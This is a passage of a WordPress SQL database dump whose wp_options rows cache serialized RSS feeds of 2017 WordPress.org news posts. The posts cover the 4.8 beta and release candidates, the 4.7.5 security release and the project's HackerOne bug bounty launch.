2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://wordpress.org/news/2017/06/wordpress-4-8-release-candidate-2/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 01 Jun 2017 22:13:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4765";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:336:"The second release candidate for WordPress 4.8 is now available. To test WordPress 4.8, you can use the WordPress Beta Tester plugin or you can download the release candidate here (zip). We&#8217;ve made a handful of changes since releasing RC 1 last week. For more details about what&#8217;s new in version 4.8, check out the [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Mel Choyce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1173:"<p>The second release candidate for WordPress 4.8 is now available.</p>\n<p>To test WordPress 4.8, you can use the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin or you can <a href="https://wordpress.org/wordpress-4.8-RC2.zip">download the release candidate here</a> (zip).</p>\n<p>We&#8217;ve made <a href="https://core.trac.wordpress.org/log/trunk/?action=stop_on_copy&amp;mode=stop_on_copy&amp;rev=40866&amp;stop_rev=40847">a handful of changes</a> since releasing RC 1 last week. For more details about what&#8217;s new in version 4.8, check out the <a href="https://wordpress.org/news/2017/05/wordpress-4-8-beta-1/">Beta 1</a>, <a href="https://wordpress.org/news/2017/05/wordpress-4-8-beta-2/">Beta 2</a>, and <a href="https://wordpress.org/news/2017/05/wordpress-4-8-release-candidate/">RC1</a> blog posts.</p>\n<p><strong>Think you&#8217;ve found a bug?</strong> Please post to the <a href="https://wordpress.org/support/forum/alphabeta/">Alpha/Beta support forum</a>. If any known issues come up, you&#8217;ll be able to <a href="https://core.trac.wordpress.org/report/5">find them here</a>.</p>\n<p>Happy testing!</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4765";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:31:"WordPress 4.8 Release Candidate";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:67:"https://wordpress.org/news/2017/05/wordpress-4-8-release-candidate/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 25 May 2017 23:04:37 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4758";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:325:"The release candidate for WordPress 4.8 is now available. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.8 on Thursday, June 8, but we need your help to get there. If you haven’t tested 4.8 yet, [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Mel Choyce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2365:"<p>The release candidate for WordPress 4.8 is now available.</p>\n<p>RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.8 on <strong>Thursday, June 8</strong>, but we need <em>your</em> help to get there. If you haven’t tested 4.8 yet, now is the time!</p>\n<p>To test WordPress 4.8, you can use the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin or you can <a href="https://wordpress.org/wordpress-4.8-RC1.zip">download the release candidate here</a> (zip).</p>\n<p>We&#8217;ve made <a href="https://core.trac.wordpress.org/log/trunk/?action=stop_on_copy&amp;mode=stop_on_copy&amp;rev=40840&amp;stop_rev=40821">a handful of changes</a> since releasing Beta 2 earlier this week. For more details about what’s new in version 4.8, check out the <a href="https://wordpress.org/news/2017/05/wordpress-4-8-beta-1/">Beta 1</a> and <a href="https://wordpress.org/news/2017/05/wordpress-4-8-beta-2/">Beta 2</a> blog posts.</p>\n<p><strong>Think you’ve found a bug?</strong> Please post to the <a href="https://wordpress.org/support/forum/alphabeta/">Alpha/Beta support forum</a>. If any known issues come up, you’ll be able to <a href="https://core.trac.wordpress.org/report/5">find them here</a>.</p>\n<p><strong>Developers</strong>, please test your plugins and themes against WordPress 4.8 and update your plugin’s <em>Tested up to</em> version in the readme to 4.8. If you find compatibility problems please be sure to post to the support forums so we can figure those out before the final release – we work hard to avoid breaking things. An in-depth field guide to developer-focused changes is coming soon on the <a href="https://make.wordpress.org/core/">core development blog</a>.</p>\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a></p>\n<p>This release&#8217;s haiku is courtesy of <a href=\'https://profiles.wordpress.org/matveb/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>matveb</a>:</p>\n<p><em>Érrese uno</em><br />\n<em>Cien veces y más</em><br />\n<em>Erre ce dos</em></p>\n<p>Thanks for your continued help testing out the latest versions of WordPress.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4758";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:20:"WordPress 4.8 Beta 2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:56:"https://wordpress.org/news/2017/05/wordpress-4-8-beta-2/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 23 May 2017 00:02:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4749";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:329:"WordPress 4.8 Beta 2 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.8, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Mel Choyce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1621:"<p>WordPress 4.8 Beta 2 is now available!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.8, try the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href="https://wordpress.org/wordpress-4.8-beta2.zip">download the beta here</a> (zip).</p>\n<p>For more information on what’s new in 4.8, check out the <a href="https://wordpress.org/news/2017/05/wordpress-4-8-beta-1/">Beta 1</a> blog post. Since then, we’ve made <a href="https://core.trac.wordpress.org/log/trunk/?action=stop_on_copy&amp;mode=stop_on_copy&amp;rev=40819&amp;stop_rev=40664&amp;limit=100&amp;sfp_email=&amp;sfph_mail=">over 50 changes</a> in Beta 2.</p>\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a></p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href="https://wordpress.org/support/forum/alphabeta">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href="https://make.wordpress.org/core/reports/">file one on WordPress Trac</a>, where you can also find <a href="https://core.trac.wordpress.org/tickets/major">a list of known bugs</a>.</p>\n<p><em>WordPress four point eight<br />\nOne step closer to release<br />\nPlease test Beta 2!</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4749";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:48:"WordPress 4.7.5 Security and Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://wordpress.org/news/2017/05/wordpress-4-7-5/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 16 May 2017 22:39:31 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Security";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:3:"4.7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4734";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:373:"WordPress 4.7.5 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.7.4 and earlier are affected by six security issues: Insufficient redirect validation in the HTTP class. Reported by Ronni Skansing. Improper handling of post meta data values in the XML-RPC [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Pascal Birchler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2349:"<p>WordPress 4.7.5 is now available. This is a <strong>security release</strong> for all previous versions and we strongly encourage you to update your sites immediately.</p>\n<p>WordPress versions 4.7.4 and earlier are affected by six security issues:</p>\n<ol>\n<li>Insufficient redirect validation in the HTTP class. Reported by <a href="https://dk.linkedin.com/in/ronni-skansing-36143b65">Ronni Skansing</a>.</li>\n<li>Improper handling of post meta data values in the XML-RPC API. Reported by <a href="https://hackerone.com/jazzy2fives">Sam Thomas</a>.</li>\n<li>Lack of capability checks for post meta data in the XML-RPC API. Reported by <a href="https://profiles.wordpress.org/vortfu">Ben Bidner</a> of the WordPress Security Team.</li>\n<li>A Cross Site Request Forgery (CSRF)  vulnerability was discovered in the filesystem credentials dialog. Reported by <a href="https://twitter.com/yorickkoster">Yorick Koster</a>.</li>\n<li>A cross-site scripting (XSS) vulnerability was discovered when attempting to upload very large files. Reported by <a href="https://dk.linkedin.com/in/ronni-skansing-36143b65">Ronni Skansing</a>.</li>\n<li>A cross-site scripting (XSS) vulnerability was discovered related to the Customizer. Reported by <a href="https://profiles.wordpress.org/westonruter">Weston Ruter</a> of the WordPress Security Team.</li>\n</ol>\n<p>Thank you to the reporters of these issues for practicing <a href="https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/">responsible disclosure</a>.</p>\n<p>In addition to the security issues above, WordPress 4.7.5 contains 3 maintenance fixes to the 4.7 release series. For more information, see the <a href="https://codex.wordpress.org/Version_4.7.5">release notes</a> or consult the <a href="https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.7.5&amp;group=component&amp;col=id&amp;col=summary&amp;col=component&amp;col=status&amp;col=owner&amp;col=type&amp;col=priority&amp;col=keywords&amp;order=priority">list of changes</a>.</p>\n<p><a href="https://wordpress.org/download/">Download WordPress 4.7.5</a> or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.7.5.</p>\n<p>Thanks to everyone who contributed to 4.7.5.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4734";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:26:"WordPress Now on HackerOne";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:62:"https://wordpress.org/news/2017/05/wordpress-now-on-hackerone/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 15 May 2017 16:02:19 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Security";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4730";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:322:"WordPress has grown a lot over the last thirteen years – it now powers more than 28% of the top ten million sites on the web. During this growth, each team has worked hard to continually improve their tools and processes. Today, the WordPress Security Team is happy to announce that WordPress is now officially [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:17:"Aaron D. Campbell";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1715:"<p>WordPress has grown a lot over the last thirteen years – it now powers more than 28% of the top ten million sites on the web. During this growth, each team has worked hard to continually improve their tools and processes. Today, the WordPress Security Team is happy to announce that <a href="https://hackerone.com/wordpress">WordPress is now officially on HackerOne</a>!</p>\n<p><a href="https://www.hackerone.com/about">HackerOne</a> is a platform for security researchers to securely and responsibly report vulnerabilities to our team. It provides tools that improve the quality and consistency of communication with reporters, and will reduce the time spent on responding to commonly reported issues. This frees our team to spend more time working on improving the security of WordPress.</p>\n<p>The security team has been working on this project for quite some time. Nikolay Bachiyski started the team working on it just over a year ago. We ran it as a private program while we worked out our procedures and processes, and are excited to finally make it public.</p>\n<p>With the announcement of the WordPress HackerOne program we are also introducing bug bounties. Bug bounties let us reward reporters for disclosing issues to us and helping us secure our products and infrastructure. We&#8217;ve already awarded more than $3,700 in bounties to seven different reporters! We are thankful to Automattic for paying the bounties on behalf of the WordPress project.</p>\n<p>The program and bounties cover all our projects including WordPress, BuddyPress, bbPress, GlotPress, and WP-CLI as well as all of our sites including WordPress.org, bbPress.org, WordCamp.org, BuddyPress.org, and GlotPress.org.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4730";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:20:"WordPress 4.8 Beta 1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:56:"https://wordpress.org/news/2017/05/wordpress-4-8-beta-1/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 13 May 2017 00:15:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4727";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:342:"We&#8217;re planning a smaller WP release early next month, bringing in three major enhancements: An improved visual editor experience, with a new TinyMCE that allows you to navigate more intuitively in and out of inline elements like links. (Try it out to see, it&#8217;s hard to describe.) A revamp of the dashboard news widget to [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Matt Mullenweg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1148:"<p>We&#8217;re planning a smaller WP release early next month, bringing in three major enhancements:</p>\n<ul>\n<li>An improved visual editor experience, with a new TinyMCE that allows you to navigate more intuitively in and out of inline elements like links. (Try it out to see, it&#8217;s hard to describe.)</li>\n<li>A revamp of the dashboard news widget to bring in nearby and upcoming events including meetups and WordCamps.</li>\n<li>Several new media widgets covering images, audio, and video, and an enhancement to the text widget to support visual editing.</li>\n</ul>\n<p>The first beta of 4.8 is now available for testing. You can use the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">beta tester plugin</a> (or just run trunk) to try the latest and greatest, and each of these areas could use a ton of testing. Our goals are to make editing posts with links more intuitive, make widgets easier for new users and more convenient for existing ones, and get many more people aware of and attending our community events.</p>\n<p><em>Four point eight is here<br />\nSmall changes with a big punch<br />\nBig ones come later</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4727";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:32:"https://wordpress.org/news/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:4:"site";a:1:{i:0;a:5:{s:4:"data";s:8:"14607090";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:9:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Tue, 22 Aug 2017 14:04:15 GMT";s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";s:25:"strict-transport-security";s:11:"max-age=360";s:6:"x-olaf";s:3:"⛄";s:13:"last-modified";s:29:"Mon, 21 Aug 2017 12:09:06 GMT";s:4:"link";s:63:"<https://wordpress.org/news/wp-json/>; rel="https://api.w.org/"";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:11:"HIT lax 250";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (693203, '_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1503453856', 'no'); 
INSERT INTO `wp_options` VALUES (693204, '_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1503410656', 'no'); 
INSERT INTO `wp_options` VALUES (693205, '_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9', '1503453856', 'no'); 
INSERT INTO `wp_options` VALUES (693206, '_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:61:"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:16:"WordPress Planet";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:28:"http://planet.wordpress.org/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:2:"en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:47:"WordPress Planet - http://planet.wordpress.org/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:50:{i:0;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:84:"WPTavern: Morten Rand-Hendriksen on What Gutenberg Means For the Future of 